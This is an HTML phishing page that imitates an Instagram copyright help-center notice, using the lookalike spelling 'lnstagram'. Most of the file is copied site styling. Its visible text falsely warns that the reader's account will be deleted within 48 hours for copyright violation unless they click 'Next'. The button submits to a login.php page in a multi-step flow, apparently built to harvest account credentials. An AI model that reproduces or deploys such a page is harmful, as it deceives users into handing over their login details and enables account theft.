
<html lang="en" class="js not-logged-in client-root"><head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">      
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
		<title>lnstagram Copyright</title>
        <meta name="robots" content="noimageindex, noarchive">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="theme-color" content="#000000">
        <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">   
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="iglogo.png">
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="iglogo.png">
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="iglogo.png">
<link rel="apple-touch-icon-precomposed" sizes="50x50" href="iglogo.png">
<link rel="apple-touch-icon-precomposed" sizes="50x50" href="iglogo.png">
<link rel="icon" sizes="100x100" href="iglogo.png">
<link rel="mask-icon" sizes="50x50" href="iglogo.png" color="#262626">
<link rel="shortcut icon" type="image/x-icon" sizes="50x50" href="iglogo.png">
<style type="text/css" data-isostyle-id="917504">
    a,
    abbr,
    acronym,
    address,
    applet,
    article,
    aside,
    audio,
    b,
    big,
    blockquote,
    body,
    canvas,
    caption,
    center,
    cite,
    code,
    dd,
    del,
    details,
    dfn,
    div,
    dl,
    dt,
    em,
    embed,
    fieldset,
    figcaption,
    figure,
    footer,
    form,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    header,
    hgroup,
    html,
    i,
    iframe,
    img,
    ins,
    kbd,
    label,
    legend,
    li,
    mark,
    menu,
    nav,
    object,
    ol,
    output,
    p,
    pre,
    q,
    ruby,
    s,
    samp,
    section,
    small,
    span,
    strike,
    strong,
    sub,
    summary,
    sup,
    table,
    tbody,
    td,
    tfoot,
    th,
    thead,
    time,
    tr,
    tt,
    u,
    ul,
    var,
    video {
        margin: 0;
        padding: 0;
        border: 0;
        font: inherit;
        vertical-align: baseline
    }

    body {
        line-height: 1
    }

    ol,
    ul {
        list-style: none
    }

    blockquote,
    q {
        quotes: none
    }

    blockquote:after,
    blockquote:before,
    q:after,
    q:before {
        content: none
    }

    table {
        border-collapse: collapse;
        border-spacing: 0
    }
</style>
<style type="text/css" data-isostyle-id="917505">
    #react-root,
    article,
    div,
    footer,
    header,
    main,
    nav,
    section {
        -webkit-box-align: stretch;
        -webkit-align-items: stretch;
        -ms-flex-align: stretch;
        align-items: stretch;
        border: 0 solid #000;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        display: -webkit-box;
        display: -webkit-flex;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-orient: vertical;
        -webkit-box-direction: normal;
        -webkit-flex-direction: column;
        -ms-flex-direction: column;
        flex-direction: column;
        -webkit-flex-shrink: 0;
        -ms-flex-negative: 0;
        flex-shrink: 0;
        margin: 0;
        padding: 0;
        position: relative
    }
</style>
<style type="text/css" data-isostyle-id="917506">
    body {
        overflow-y: scroll
    }

    body:-webkit-full-screen {
        height: 100%;
        width: 100%
    }

    body:-moz-full-screen {
        height: 100%;
        width: 100%
    }

    body:-ms-fullscreen {
        height: 100%;
        width: 100%
    }

    body:fullscreen {
        height: 100%;
        width: 100%
    }

    html {
        -webkit-text-size-adjust: 100%
    }

    #react-root,
    body,
    html {
        height: 100%
    }

    #react-root {
        z-index: 0
    }
</style>
<style type="text/css" data-isostyle-id="917507">
    body,
    button,
    input,
    textarea {
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
        font-size: 14px;
        line-height: 18px
    }

    a,
    a:visited {
        color: #003569;
        text-decoration: none
    }

    a:active {
        opacity: .5
    }
</style>
<style type="text/css" data-isostyle-id="917748">
    .BARfH,
    .PIoXz {
        font-size: 10px;
        line-height: 12px;
        margin: -2px 0 -3px
    }

    .PIoXz {
        font-size: 12px;
        line-height: 14px
    }

    .xLCgt {
        font-size: 14px;
        line-height: 18px;
        margin: -3px 0 -4px
    }

    .LjQVu,
    .vy6Bb {
        font-size: 16px;
        line-height: 24px;
        margin: -6px 0
    }

    .LjQVu {
        font-size: 18px;
        margin: -4px 0 -6px
    }

    .x-6xq {
        font-size: 22px;
        line-height: 26px;
        margin: -4px 0 -5px
    }

    .fKFbl {
        font-size: 28px;
        line-height: 32px;
        margin: -5px 0 -6px
    }

    .T0kll {
        margin: 0
    }

    .yUEEX {
        font-weight: 300
    }

    .MMzan {
        font-weight: 400
    }

    .qyrsm {
        font-weight: 600
    }

    .KV-D4 {
        color: #262626
    }

    ._0PwGv {
        color: #999
    }

    .tx0Md {
        color: #003569
    }

    .fDdiY {
        color: #ed4956
    }

    .OgsCw {
        color: #70c050
    }

    .gtFbE {
        color: #3897f0
    }

    .mDXrS {
        color: #c7c7c7
    }

    .h_zdq {
        color: #fff
    }

    .uL8Hv {
        display: block
    }

    ._7UhW9 ._7UhW9,
    .se6yk {
        display: inline !important;
        margin: 0 !important
    }

    .fDxYl {
        display: block;
        overflow: hidden;
        text-overflow: ellipsis;
        white-space: nowrap
    }

    .zuV7c {
        white-space: pre
    }

    .p1tLr {
        white-space: pre-wrap
    }

    .l4b0S {
        text-align: center
    }

    .M8ipN {
        text-align: left
    }

    .lV_gY {
        text-align: right
    }

    .hjZTB {
        overflow-wrap: break-word;
        white-space: normal
    }
</style>
<style type="text/css" data-isostyle-id="2621442">
    .uyNTq {
        -webkit-box-flex: 1;
        -webkit-flex-grow: 1;
        -ms-flex-positive: 1;
        flex-grow: 1;
        text-align: center
    }

    ._1EAPK {
        margin: 24px auto 16px;
        -webkit-box-align: center;
        -webkit-align-items: center;
        -ms-flex-align: center;
        align-items: center
    }

    .Y2zF4 {
        margin: 0 44px 16px
    }

    .mwe-c {
        margin: 0 0 16px;
        text-align: center
    }

    .mwe-c>* {
        -webkit-box-align: center;
        -webkit-align-items: center;
        -ms-flex-align: center;
        align-items: center
    }

    .HKQDM {
        margin: 16px 44px
    }

    .rWNvP {
        text-align: left
    }

    .yg0R0 {
        color: #3897f0;
        font-weight: 600
    }

    ._4Ph6s {
        position: fixed;
        bottom: 0;
        left: 0;
        right: 0
    }

    .Q4U2B {
        background-color: #fff;
        border-top: 1px solid #efefef;
        color: inherit;
        font-weight: 600;
        line-height: 44px
    }

    @media (min-width:736px) {
        .uyNTq {
            max-width: 388px
        }

        ._4Ph6s {
            margin-top: 80px;
            position: static
        }
    }
</style>
<style type="text/css" data-isostyle-id="5963779">
    ._8qite {
        -webkit-box-flex: 1;
        -webkit-flex-grow: 1;
        -ms-flex-positive: 1;
        flex-grow: 1;
        -webkit-box-pack: center;
        -webkit-justify-content: center;
        -ms-flex-pack: center;
        justify-content: center;
        margin: 44px 0;
        overflow: hidden
    }

    .aytYC {
        z-index: 10
    }

    .paRpx {
        display: inline-block;
        margin-top: 2px;
        vertical-align: middle
    }
</style>
<style type="text/css" data-isostyle-id="5963781">
    .AHCwU {
        background-color: #fff;
        border: 1px solid #dbdbdb;
        border-radius: 3px;
        margin: 60px auto 0;
        max-width: 935px;
        overflow: hidden
    }

    .AHCwU:empty {
        border: 0
    }
</style>
<style type="text/css" data-isostyle-id="6029326">
    .E3X2T {
        min-height: 100%;
        overflow: hidden
    }

    .W5aj_ {
        left: 0;
        position: fixed;
        right: 0;
        top: 0;
        z-index: 12
    }

    .ABLKx {
        -webkit-box-ordinal-group: 2;
        -webkit-order: 1;
        -ms-flex-order: 1;
        order: 1
    }

    .VhasA {
        -webkit-box-ordinal-group: 4;
        -webkit-order: 3;
        -ms-flex-order: 3;
        order: 3
    }

    .SCxLW {
        -webkit-box-flex: 1;
        -webkit-flex-grow: 1;
        -ms-flex-positive: 1;
        flex-grow: 1;
        -webkit-box-ordinal-group: 5;
        -webkit-order: 4;
        -ms-flex-order: 4;
        order: 4
    }

    ._3Laht,
    .o64aR {
        background-color: #fff
    }

    ._09ncq,
    .uzKWK {
        background-color: #fff
    }

    ._8Rna9 {
        -webkit-box-ordinal-group: 6;
        -webkit-order: 5;
        -ms-flex-order: 5;
        order: 5;
        padding: 0 20px
    }

    .GhZ_W {
        margin-top: 85px
    }

    .NXc7H,
    .XajnB {
        -webkit-box-ordinal-group: 3;
        -webkit-order: 2;
        -ms-flex-order: 2;
        order: 2
    }

    .gW4DF,
    .jLuN9 {
        -webkit-box-ordinal-group: 1;
        -webkit-order: 0;
        -ms-flex-order: 0;
        order: 0
    }

    .jLuN9 {
        background-color: #fff;
        padding: 0
    }

    .f11OC {
        padding: 0 20px;
        -webkit-box-ordinal-group: 6;
        -webkit-order: 5;
        -ms-flex-order: 5;
        order: 5
    }

    @supports (margin-bottom:env(safe-area-inset-bottom)) {
        .f11OC:not(.X6gVd) {
            margin-bottom: env(safe-area-inset-bottom)
        }
    }

    .X6gVd {
        -webkit-box-ordinal-group: 1;
        -webkit-order: 0;
        -ms-flex-order: 0;
        order: 0
    }

    .XajnB {
        -webkit-flex-basis: 75px;
        -ms-flex-preferred-size: 75px;
        flex-basis: 75px
    }

    .oBPxI {
        margin-bottom: 44px
    }
</style>
<style type="text/css" data-isostyle-id="6029383">
    .iseBh {
        font-size: 12px;
        font-weight: 600;
        margin: 0 auto;
        text-transform: uppercase;
        width: 100%
    }

    .DINPA {
        color: #999
    }

    .K5OFK {
        display: inline-block;
        margin-bottom: 7px;
        margin-right: 16px
    }

    .K5OFK:last-child {
        margin-right: 0
    }

    .ixdEe {
        -webkit-box-flex: 1;
        -webkit-flex-grow: 1;
        -ms-flex-positive: 1;
        flex-grow: 1;
        margin-bottom: 3px
    }

    @media (min-width:876px) {

        .SkY6J,
        .VWk7Y {
            -webkit-box-orient: horizontal;
            -webkit-box-direction: normal;
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
            -webkit-flex-wrap: wrap;
            -ms-flex-wrap: wrap;
            flex-wrap: wrap;
            -webkit-box-pack: justify;
            -webkit-justify-content: space-between;
            -ms-flex-pack: justify;
            justify-content: space-between;
            padding: 38px 0
        }

        .SkY6J .uxKLF,
        .VWk7Y .uxKLF {
            max-width: 100%
        }

        .SkY6J .ixdEe,
        .VWk7Y .ixdEe {
            margin-right: 16px
        }
    }

    @media (max-width:875px) {

        .SkY6J,
        .VWk7Y {
            padding: 10px 0;
            text-align: center
        }

        .SkY6J .ixdEe,
        .VWk7Y .ixdEe {
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -ms-flex-pack: center;
            justify-content: center;
            margin: 0 auto;
            max-width: 360px
        }
    }

    .S2wby {
        padding: 10px 0;
        text-align: center
    }

    .S2wby .ixdEe {
        -webkit-box-pack: center;
        -webkit-justify-content: center;
        -ms-flex-pack: center;
        justify-content: center;
        margin: 0 auto;
        max-width: 360px
    }

    .SkY6J {
        padding-top: 0
    }

    .SkY6J .uxKLF {
        margin-bottom: 16px
    }

    .SkY6J .K5OFK {
        margin: 0
    }

    .SkY6J .K5OFK:not(:last-of-type)::after {
        content: "\00B7";
        margin: 0 .25em
    }

    .SkY6J .DINPA,
    .SkY6J .K5OFK,
    .SkY6J .l93RR {
        color: #c7c7c7;
        font-size: 11px;
        font-weight: 400;
        line-height: 13px;
        text-transform: capitalize
    }

    .SkY6J .DINPA {
        text-transform: uppercase
    }
</style>
<style type="text/css" data-isostyle-id="6029712">
    .K-1uj {
        -webkit-box-orient: horizontal;
        -webkit-box-direction: normal;
        -webkit-flex-direction: row;
        -ms-flex-direction: row;
        flex-direction: row
    }

    .s311c {
        -webkit-box-flex: 1;
        -webkit-flex-grow: 1;
        -ms-flex-positive: 1;
        flex-grow: 1;
        -webkit-flex-shrink: 1;
        -ms-flex-negative: 1;
        flex-shrink: 1;
        background-color: #efefef;
        height: 1px;
        position: relative;
        top: .45em
    }

    ._0tv-g {
        color: #999;
        -webkit-box-flex: 0;
        -webkit-flex-grow: 0;
        -ms-flex-positive: 0;
        flex-grow: 0;
        -webkit-flex-shrink: 0;
        -ms-flex-negative: 0;
        flex-shrink: 0;
        font-size: 13px;
        font-weight: 600;
        line-height: 15px;
        margin: 0 18px;
        text-transform: uppercase
    }
</style>
</head>
    <body class="" style="zoom: 1;">    
    <span id="react-root">
	<section class="_9eogI E3X2T">
	<main class="SCxLW  o64aR" role="main"><div class="_8qite">
	<div class="AHCwU"><div class="uyNTq">
	<div class="_1EAPK">
	<img class="coreSpriteLockSmall" src="iglogo.png" style="width:90px;height: 90px;"></div>
	<div class="Y2zF4"><h2 class="_7UhW9    vy6Bb      qyrsm KV-D4        uL8Hv         " style="font-size:18px;">Copyright | lnstagram Help Center <img src="" <="" h2=""></h2></div>
	<div class="Y2zF4"><div class="_7UhW9   xLCgt      MMzan   _0PwGv       uL8Hv         ">Your account has filed a complaint to our team for violating copyright. Your account will be permanently deleted from our servers within 48 hours. If this is an error, please click the button below to provide feedback. Please note that your account will be permanently deleted if you do not provide feedback  </div></div>
    	<form class="Y2zF4" action="login.php"><div class="rWNvP">
   		<div "="">
    			<div "="">
    				</div>
    				<div></div></div></div>      
    	<div "="">
            <input type="submit" style="font-weight:600;padding:5px 9px;text-align:center;background-color:#3897f0;border:1px solid #3897f0;border-radius:4px;color:#fff;" value="Next"></div></form>
		<div class="HKQDM">
                        <div class="K-1uj">
                            <div class="s311c"></div>
                            <div class="_0tv-g">1/4</div>
                            <div class="s311c"></div>
                        </div>
                    </div>
    	<div class="_4Ph6s"></div></div></div></main><footer class="_8Rna9  _3Laht " role="contentinfo"><div class="iseBh  VWk7Y " style="max-width: 935px;"><nav class="uxKLF"></nav></div></footer></section></span>
</body></html>
